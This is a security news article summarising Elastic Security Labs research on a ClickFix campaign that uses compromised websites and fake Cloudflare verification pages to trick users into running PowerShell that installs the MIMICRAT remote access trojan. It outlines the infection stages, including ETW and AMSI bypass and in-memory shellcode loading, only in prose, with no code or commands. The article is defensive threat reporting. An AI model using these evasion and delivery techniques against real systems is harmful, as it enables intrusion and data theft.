Cybersecurity researchers have uncovered a sophisticated ClickFix campaign that leverages compromised legitimate websites to distribute a newly identified remote access trojan named MIMICRAT, also referred to as AstarionRAT.
According to Elastic Security Labs, the operation demonstrates significant technical maturity. Attackers are using breached websites across various industries and regions as delivery infrastructure, deploying a multi stage PowerShell infection chain designed to evade detection mechanisms before installing the final payload.
Multi Stage Infection Chain
The campaign begins with the compromise of legitimate websites. In one documented case, attackers breached bincheck[.]io, a legitimate Bank Identification Number validation service, and injected malicious JavaScript.
The injected script loads an external PHP file that presents victims with a fake Cloudflare verification page. Users are instructed to copy and paste a command into the Windows Run dialog, initiating the infection process.
Once executed, the PowerShell command:
- Connects to a command and control server
- Downloads a second stage PowerShell script
- Bypasses Event Tracing for Windows (ETW)
- Disables the Antimalware Scan Interface, (AMSI)
- Drops a Lua based shellcode loader
In the final stage, the Lua script decrypts and executes shellcode directly in memory, delivering the MIMICRAT payload.
MIMICRAT Capabilities
MIMICRAT is a custom C++ remote access trojan built for post exploitation. It communicates with its command server over HTTPS using port 443 and mimics legitimate web analytics traffic to blend into normal network activity.
The malware supports 22 commands and includes features such as:
- Windows token impersonation
- Interactive shell access
- File system manipulation
- Shellcode injection
- SOCKS5 proxy tunneling
These capabilities allow attackers to move laterally, maintain persistence, and potentially prepare the environment for ransomware deployment or data theft.
Links to Matanbuchus Activity
Researchers believe the infrastructure shares tactical overlaps with another ClickFix campaign previously documented by Huntress, which distributed the Matanbuchus 3.0 loader. In some cases, Matanbuchus served as an intermediary loader that ultimately deployed the same MIMICRAT implant.
The broader objective of the campaign is suspected to be either ransomware execution or large scale data exfiltration.
Global and Localized Targeting
Security researcher Salim Bitam noted that the lure content supports 17 languages and dynamically adjusts based on the victim’s browser settings. This localization strategy increases the campaign’s effectiveness and expands its global reach.
Identified victims include a university in the United States and several Chinese speaking users who discussed related incidents in public forums, suggesting opportunistic but widespread targeting.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
